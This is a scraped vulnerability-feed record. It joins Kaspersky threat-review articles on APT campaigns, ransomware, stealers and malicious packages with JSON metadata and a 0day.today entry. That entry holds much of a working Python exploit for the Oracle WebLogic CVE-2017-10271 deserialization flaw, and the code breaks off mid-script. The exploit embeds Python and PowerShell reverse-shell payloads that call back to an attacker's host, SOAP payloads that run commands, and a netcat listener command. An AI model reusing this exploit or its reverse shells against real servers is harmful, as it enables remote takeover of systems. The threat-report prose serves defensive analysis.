In August, [two Israeli researchers discovered](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>) fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. A compromised password can be changed, but a biometric characteristic is for life.

Moreover, the more widespread use of smart devices in new areas of our lives opens up a bigger pool of data for attackers. Consider, for example, the potential impact of smart speakers for listening in on unguarded conversations in the home. Social media giants are sitting on a growing pile of personal information – information that would prove very valuable to criminals and APT threat actors alike.

## Final thoughts

We will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).

_Source: [APT review: what the world's threat actors got up to in 2019](<https://securelist.com/ksb-2019-review-of-the-year/95394/>), Securelist, published 2019-12-04._

 * **IT threat evolution in Q3 2022**
 * [IT threat evolution in Q3 2022. Non-mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/>)
 * [IT threat evolution in Q3 2022.
Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)

## Targeted attacks

### CosmicStrand: discovery of a sophisticated UEFI rootkit

In July, we [reported a rootkit](<https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/>) that we found in modified [Unified Extensible Firmware Interface](<https://encyclopedia.kaspersky.com/glossary/uefi/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating system. Difficult to detect, they ensure that a computer remains infected even if someone reinstalls the operating system or replaces the hard drive. However, they aren't easy to create: the slightest programming error could crash the machine. Nevertheless, in our [APT predictions for 2022](<https://securelist.com/advanced-threat-predictions-for-2022/104870/>), we noted that more attackers would reach the sophistication level required to develop such tools.

The main purpose of CosmicStrand is to download a malicious program at startup, which then performs the tasks set by the attackers. Having successfully passed through all stages of the boot process, the rootkit eventually runs shellcode and contacts the attackers' C2 (Command-and-Control) server, from which it receives a malicious payload.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/07/20124904/CosmicStrand_UEFI_malware_01.png>)

We were unable to intercept the file received by the rootkit from the C2 server. However, on one of the infected machines, we found malware that we think is probably related to CosmicStrand. This malware creates a user named "aaaabbbb" in the operating system with local administrator rights.

We identified targets of CosmicStrand, which we attribute to an unknown Chinese-speaking threat actor, in China, Vietnam, Iran and Russia. All of them were ordinary people using our free antivirus solution, seemingly unconnected with any organization of interest to a sophisticated attacker of this kind. It also turned out that the motherboards infected in all known cases came from just two manufacturers. Therefore, it's likely that the attackers found some common vulnerability in these motherboards that made UEFI infection possible.

It's also unclear how the attackers managed to deliver the malware. It's possible that the attackers are able to infect UEFI remotely. Or that those infected had purchased a modified motherboard from a reseller.

### Andariel deploys DTrack and Maui ransomware

On 6 July, the US CISA (Cybersecurity and Infrastructure Security Agency) published an [alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>) accusing North Korean state-sponsored threat actors of using the Maui ransomware to target the US healthcare sector. While CISA offered nothing to substantiate its attribution, [we determined](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) that approximately 10 hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the same target, preceded by deployment of the 3proxy tool months earlier. We believe that this helps to solidify the attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly), with low-to-medium confidence.

Andariel's primary tool is DTrack, used to collect information about the target, send it to a remote host and, in the case of the variant used in these attacks, store it on a remote host in the target network. When the attackers find noteworthy data, the Maui ransomware is deployed – it is typically detected on targeted hosts 10 hours after the activation of DTrack.

The attackers also use another tool, called 3Proxy, to maintain remote access to the compromised computer.

To infect target systems, the attackers exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a PowerShell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.

Our research revealed that, rather than just focusing on a particular industry, Andariel is ready to attack any company. We detected at least one attack on a housing company in Japan, as well as several targets in India, Vietnam and Russia.

### VileRAT: DeathStalker's continuous strike at foreign and crypto-currency exchanges

In late August 2020, we published an [overview of DeathStalker](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) and its activities, including the Janicab, Evilnum and PowerSing campaigns. Later that year, we documented the [PowerPepper](<https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/>) campaign. We believe DeathStalker to be a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support competitive and financial intelligence efforts. Meanwhile, in August 2020, we also released a private report on VileRAT for our threat intelligence customers. VileRAT is a Python implant, part of [an evasive and highly intricate attack campaign](<https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/>) against foreign exchange and cryptocurrency trading companies.
We discovered it in Q2 2020 as part of an update of Evilnum, and attributed it to DeathStalker.

Since we first identified it, DeathStalker has continuously updated and used its VileRAT tool-chain against the same type of targets.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/05135347/VileRAT_DeathStalkers_continuous_strike_02.png>)

The threat actor has also sought to escape detection. However, the VileRAT campaign took this to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign we have ever identified from DeathStalker. From state-of-the-art obfuscation with VBA and JavaScript, to multi-layered and low-level packing with Python, a robust multi-stage in-memory PE loader and security vendor-specific heuristic bypasses – the threat actor has left nothing to chance. On top of this, DeathStalker has developed a vast and quickly changing infrastructure as well.

On the other side, there are some glitches and inconsistencies. VileRAT, the final payload in the tool-chain, is more than 10MB in size. The group uses simple infection vectors, many suspicious communication patterns, noisy and easy-to-identify process executions or file deployments, as well as sketchy development practices leaving bugs that require frequent implant updates. For these reasons, an effective endpoint solution will still be able to detect and block most VileRAT-related malicious activities.

Using only data that we could verify with our own telemetry, we identified 10 organizations compromised or targeted by DeathStalker since 2020 – in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the UAE and the Russian Federation.

We do not know what DeathStalker's principal intention is in targeting these organizations: this could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding customers to bypass sanctions and/or spying on targets' customers. However, it does not appear to be direct financial gain.

### Kimsuky's GoldDragon cluster and C2 operations

Kimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group updates its tools frequently. We recently had the chance to investigate how the threat actor configures its GoldDragon cluster and what kind of tricks it uses to confirm and further validate its victims. The Kimsuky group has configured multi-stage C2 servers with various commercial hosting services located around the world.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22113157/Kimsukys_GoldDragon_03.png>)

The attacks occur in several stages. First, the threat actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first-stage C2 server, with an email address as a parameter. The first-stage C2 server verifies that the incoming email address parameter is expected and delivers the malicious document if it's in the target list. The first-stage script also forwards the victim's IP address to the next-stage server. When the fetched document is opened, it connects to the second C2 server. The corresponding script on the second C2 server checks the IP address forwarded from the first-stage server to verify that it's an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks the operating system type and predefined user-agent strings to filter out requests from security researchers or auto-analysis systems.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22112947/Kimsukys_GoldDragon_01.png>)

Based on the contents of the decoy document, we hypothesize that the targets of this operation are people or entities related to political or diplomatic activities. We know that historically politicians, diplomats, journalists, professors and North Korean defectors have been prime targets of the Kimsuky group. The email address names from the C2 scripts help to confirm this hypothesis.

Our [research](<https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/>) underlines how Kimsuky pays close attention to validating its victims and delivering the next-stage payloads to them, while taking steps to make analysis difficult.

### Targeted attacks on industrial enterprises

In August, Kaspersky ICS CERT experts reported [a wave of targeted attacks on military industrial complex enterprises and public institutions](<https://ics-cert.kaspersky.com/publications/reports/2022/08/08/targeted-attack-on-industrial-enterprises-and-public-institutions/?utm_source=securelist&utm_medium=link&utm_campaign=targeted-attack-on-industrial-enterprises-and-public-institutions>) in Belarus, Russia, Ukraine and Afghanistan. The attacks, which took place earlier this year, affected industrial plants, design bureaus and research institutes, government agencies, ministries and departments.
We identified more than a dozen targets, and observed significant overlaps in TTPs (Tactics, Techniques and Procedures) with the threat actor TA428.

The attackers gained access to the enterprise network using carefully crafted phishing emails. Some of the information they contained is not publicly available, indicating that the attackers conducted reconnaissance ahead of the attack, possibly using information obtained in earlier attacks on the target organization or others associated with the target. Microsoft Word documents attached to the phishing emails contained malicious code that exploits the [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) vulnerability, which enables an attacker to execute arbitrary code – in this case, the main module of the PortDoor backdoor – without any additional user action.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/03155648/APT_TA428_targeted_attack_01.png>)

The attackers used five different backdoors at the same time – probably for redundancy. They provide extensive functionality for controlling infected systems and collecting confidential data. Once they have gained initial access, the attackers attempt to spread to other computers on the network. Once they have obtained domain administrator privileges, they search for, and exfiltrate, sensitive data to their servers hosted in different countries – these servers are also used as first-stage C2 servers. The attackers compress stolen files into encrypted and password-protected ZIP archives. After receiving the data, the first-stage C2 servers forward the archives to a second-stage server located in China.

## Other malware

### Prilex: the pricey prickle credit card complex

Prilex, active since 2014, is a well-known threat actor targeting ATMs and Point of Sale (PoS) terminals. In 2016, the group began to focus all its activities on PoS systems. Since then, the group has greatly improved its malware, developing complex threats that pose a major risk to the payment chain. Prilex is now conducting so-called "GHOST" attacks – fraudulent transactions using cryptograms, which are pre-generated by the victim's card during the store payment process.

The group delivers its malware using social engineering. The cybercriminals call their chosen target and tell them their PoS software needs to be updated by a technician. Later, the fake technician goes to the targeted company in person and infects the machines. Alternatively, they persuade the target to install AnyDesk and use this to install the malware remotely.

Prior to striking victims, the cybercriminals perform an initial screening of the machine, in order to check the number of transactions that have already taken place and whether this target is worth attacking. If so, the malware captures any running transaction and modifies its content in order to be able to capture the card information. All the captured card details are then saved to an encrypted file, which is later sent to the attackers' server, allowing them to make transactions through a fraudulent PoS device registered in the name of a fake company.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/28092316/Prilex_ATM_and_PoS_report_10_1.png>)

Having attacked one PoS system, the cybercriminals obtain data from dozens, or even hundreds, of cards daily. It is especially dangerous if the infected machines are located in popular shopping malls in densely populated cities, where the daily flow of customers can reach thousands of people.

In [our recent investigation](<https://securelist.com/prilex-atm-pos-malware-evolution/107551/>), we discovered that the Prilex group is controlling the development lifecycle of its malware using Subversion – a version control system used by professional development teams. Moreover, there is also a supposed official Prilex website selling its malware kits to other cybercriminals as Malware-as-a-Service (MaaS). Prilex has previously sold various versions of its malware on the [dark web](<https://encyclopedia.kaspersky.com/glossary/dark-web/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>); for example, in 2019 a German bank [lost more than €1.5 million](<https://www.zdnet.com/article/german-bank-loses-eur1-5-million-in-mysterious-cashout-of-emv-cards/>) in a similar attack by the Prilex malware. The development of its MaaS operation means that highly sophisticated and dangerous PoS malware could spread to many countries, increasing the risk of multimillion-dollar losses for businesses all around the world.

We also discovered websites and Telegram chats where cybercriminals sell Prilex malware. Posing as the Prilex group itself, they offer the latest versions of PoS malware, costing from $3,500 to $13,000. We are not sure about the real ownership of these websites, as they could be copycats.

### Luna and Black Basta: new ransomware for Windows, Linux and ESXi

Ransomware groups have increasingly targeted not only Windows computers, but also Linux devices and ESXi virtual machines. We highlighted one example earlier this year – the [BlackCat](<https://www.kaspersky.com/blog/black-cat-ransomware/44120/>) gang, which distributes malware written in the cross-platform language Rust. We recently analyzed two other malware families that provide similar functionality: [Black Basta and Luna](<https://securelist.com/luna-black-basta-ransomware/106950/>).

Black Basta, first discovered in February, exists in versions for Windows and for Linux – the latter primarily targeting ESXi virtual machine images.
One of the key features of the Windows version is that it boots the system in Safe Mode before encrypting data: this allows the malware to evade detection by security solutions, many of which don't work in Safe Mode.

At the time we published our report, Black Basta operators had released information on 40 victims, among them manufacturing and electronics firms, contractors, and others, located in the US, Australia, Europe, Asia and Latin America.

Luna, discovered in June and also written in Rust, is able to encrypt both Windows and Linux devices, as well as ESXi virtual machine images. In an advert on the dark web, the cybercriminals claim to co-operate only with Russian-speaking partners. This means that the targets of interest to the attackers are most likely located outside the former Soviet Union. This is also borne out by the fact that the ransom note embedded into the code of the ransomware is written in English, albeit with mistakes.

### Malicious packages in online code repositories

In July, we reported a malicious campaign that we named [LofyLife](<https://securelist.com/lofylife-malicious-npm-packages/107014/>). Using our internal automated system for monitoring open-source repositories, our researchers identified four malicious packages spreading Volt Stealer and Lofy Stealer malware in the npm repository.

The identified malicious packages appeared to be used for ordinary tasks such as formatting headlines or certain gaming functions. The "formatting headlines" package was in Brazilian Portuguese with a "#brazil" hashtag, suggesting that the attackers were seeking to target people based in Brazil. Other packages were presented in English, so they could be targeting users from other countries.

The packages contained highly obfuscated malicious JavaScript and Python code. This made them harder to analyze when being uploaded to the repository. The malicious payload consisted of malware written in Python dubbed Volt Stealer – an open-source malicious script – and JavaScript malware dubbed Lofy Stealer. Volt Stealer was used to steal Discord tokens from infected machines, along with the victim's IP address, and upload them via HTTP. Lofy Stealer infects Discord client files and monitors the victim's actions, detecting when a person logs in, changes the registered email or password, enables or disables multi-factor authentication and adds new payment methods (in which case the malware steals full credit card details). It uploads collected information to a remote endpoint.

The npm repository is an open-source home for JavaScript developers to share and reuse code for building various web applications. As such, it represents a significant supply chain that, if exploited by attackers, can be used to deliver malware to many people. [This is not the first time we've seen an npm package poisoned in this way](<https://www.kaspersky.com/blog/uaparser-js-infected-versions/42700/>).

npm is not the only such code repository to have been targeted recently. In August, Check Point [published a report](<https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/>) on 10 malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers' personal data and credentials. Following this research, [we discovered two other malicious Python packages in the PyPI](<https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/>), masquerading as "[requests](<https://pypi.org/project/requests/#files>)", one of the most popular open-source packages.

The attacker used a description of the legitimate "requests" package in order to trick victims into installing a malicious one. In addition, the description contained fake statistics, and the project description referenced the web pages of the original "requests" package, as well as the author's email. All mentions of the legitimate package's name were replaced with the name of the malicious one.

### Cyberthreats facing gamers

The gaming industry is huge and growing. The industry attracts [an audience of more than 3 billion people worldwide](<https://newzoo.com/insights/articles/games-market-engagement-revenues-trends-2020-2023-gaming-report>) – a huge pool of potential victims for cybercriminals who target this sector. Cybercriminals make extensive use of social engineering tricks to entice potential victims into installing malware: [the promise of an Android version of a game that's not on Google Play](<https://www.kaspersky.com/blog/fortnite-security/23685/>); [the chance to play games for free](<https://www.kaspersky.com/blog/free-smartphone-games/37303/>); access to game cheats; etc.

We recently published our [report on gaming-related threats](<https://securelist.com/gaming-related-cyberthreats-2021-2022/107346/>) in 2021–22. Here are some of the key headlines:

 * In the year up to June 2022, Kaspersky blocked gaming-related malware and unwanted software on the computers of 384,224 people, with 91,984 files distributed under the guise of 28 games.
 * The top five PC games used as bait in these attacks were Minecraft, Roblox, Need for Speed, Grand Theft Auto and Call of Duty.
 * The top five mobile games used as a lure to target gamers were Minecraft, Roblox, Grand Theft Auto, PUBG and FIFA.
 * Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers' security.
In the year to June 2022, we detected 3,154 unique files of this type, affecting 13,689 people.\n * Miners pose an increasing threat, with Far Cry, Roblox, Minecraft, Valorant and FIFA heading the list of games and game series that cybercriminals used as a lure for such threats.\n\nAmong the top threats is RedLine, which we deemed worthy of a [separate report](<https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/>). The attackers distribute this password-stealing Trojan under the guise of game cheats in an attempt to steal accounts, card numbers, crypto-wallets and more. They post videos on YouTube purportedly about how to use cheats in popular online games such as Rust, FIFA 22, DayZ and others. The videos prompt the victim to follow a link in the description to download and run a self-extracting archive.\n\nThe Trojan, once installed, steals account passwords, credit card details, session cookies and more. RedLine is also able to execute commands on the computer, as well as download and install other programs onto the infected machine.\n\nRedLine also comes with a cryptocurrency miner. Gaming computers are a logical target for cybercriminals, since they typically have powerful GPUs \u2013 useful for cryptocurrency mining.\n\nIn addition to losing sensitive data, the player's reputation is at stake. RedLine downloads videos from the C2 server and posts them on the victim's YouTube channel \u2013 the same video that led the gamer to become infected. In this way, they become the means by which other gamers become infected.\n\n### NullMixer: oodles of Trojans in a single dropper\n\nTrying to save money by using unlicensed software can be costly: a single file downloaded from an unreliable source can result in system compromise. 
In September, we published our analysis of NullMixer, a Trojan dropper designed to drop a wide variety of malware families.\n\nNullMixer spreads via malicious web sites that can be accessed using standard search engines. Often, the web sites host "cracks", "keygens" and activators for downloading software illegally: they pretend to be legitimate, but actually contain a malware dropper. They stay at the top of search engine results using SEO.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23132345/NullMixer_report_01.png>)\n\nWhen someone attempts to download software from one of these sites, they are redirected multiple times, ending up on a page containing download instructions and archived password-protected malware masquerading as the desired piece of software. When they extract and execute the file, the malware drops a number of malicious files to the compromised machine. The malware families dropped onto the computer include SmokeLoader/Smoke, LgoogLoader, Disbuk, RedLine (described above), Fabookie and ColdStealer, consisting of backdoors, spyware, bankers, credential stealers, droppers and more.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23170555/NullMixer_report_06.jpg>)\n\nOnce all the dropped files have been launched, the NullMixer starter beacons to the C2 to confirm the successful installation. The dropped files are then left to their own devices.\n\nSince the beginning of the year, we have blocked attempts to infect more than 47,778 people worldwide. Some of the most targeted countries are Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey and the US.\n\nMany of the malware families dropped by NullMixer are downloaders, which suggests that infections will not be limited to the malware families described in [our report](<https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/>). 
Many of the other malware families mentioned here are stealers, and compromised credentials can be used for further attacks inside a local network.\n\n### Potential threat in the browser\n\nBrowser extensions are very useful for blocking ads, keeping a to-do list, spellchecking, translating text and much more. They are also popular: Chrome, Safari, Mozilla and other browsers have their own online stores distributing thousands of extensions \u2013 and the most popular plug-ins there reach over 10 million people. However, extensions are not always secure; and even seemingly innocent add-ons can present a real risk.\n\nMalicious and unwanted add-ons promote themselves as useful, and often do have legitimate functions implemented along with malicious ones. Some impersonate popular legitimate extensions. Often, such add-ons are distributed through official marketplaces. In 2020, Google [removed](<https://threatpost.com/google-yanks-106-malicious-chrome-extensions/156731/>) 106 browser extensions from its Chrome Web Store \u2013 all siphoned off sensitive user data, such as cookies and passwords, and even took screenshots. These extensions had been downloaded 32 million times.\n\nIt's always good to check the permissions an extension requests during installation. And if it's asking for permission to do things that don't seem appropriate, don't install it. For example, a browser calculator that asks for access to geolocation or browsing history. However, it's not always so clear. Often the wording is so vague that it is impossible to tell exactly how secure an extension is. Basic extensions often require permission to "read and change all your data on the websites you visit". They may really need it in order to function properly, but this permission gives the extension wide powers.\n\nEven if not malicious, they can still be dangerous. Many collect massive amounts of data from web pages people visit. 
To earn more money, some developers [may pass](<https://www.pcworld.com/article/410966/web-of-trust-browser-extensions-yanked-after-proving-untrustworthy.html>) it on to third parties or sell it to advertisers. If that data is not anonymized properly, information about web sites that people visit and what they do there could be exposed to third parties.\n\nExtension developers are also able to push updates without requiring any action by the person who installed it. Even a legitimate extension could be later hijacked to install malware.\n\nWe recently published an [overview of the types of threat that mimic useful web-browser extensions and statistics on attacks](<https://securelist.com/threat-in-your-browser-extensions/107181/>), using data from the Kaspersky Security Network (KSN), for the period between January 2020 and June 2022.\n\nIn the first half of this year, 1,311,557 people tried to download malicious or unwanted extensions at least once, which is more than 70 percent affected by the same threat in the whole of last year.\n\nFrom January 2020 to June 2022, adware hiding in browser extensions affected more than 4.3 million people, which is approximately 70 percent of all people affected by malicious and unwanted add-ons.\n\nThe most common threat in the first half of 2022 was the WebSearch family of adware extensions, able to collect and analyze search queries and redirect people to affiliate links.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-18T08:00:32", "type": "securelist", "title": "IT threat evolution Q3 2022", "bulletinFamily": "blog", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2017-11882"], "modified": "2022-11-18T08:00:32", "id": "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "href": "https://securelist.com/it-threat-evolution-q3-2022/107957/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "cvss3": {}, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "id": "1337DAY-ID-29668", "href": "https://0day.today/exploit/description/29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "id": "1337DAY-ID-29395", "href": 
"https://0day.today/exploit/description/29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. 
E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n 
self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n 
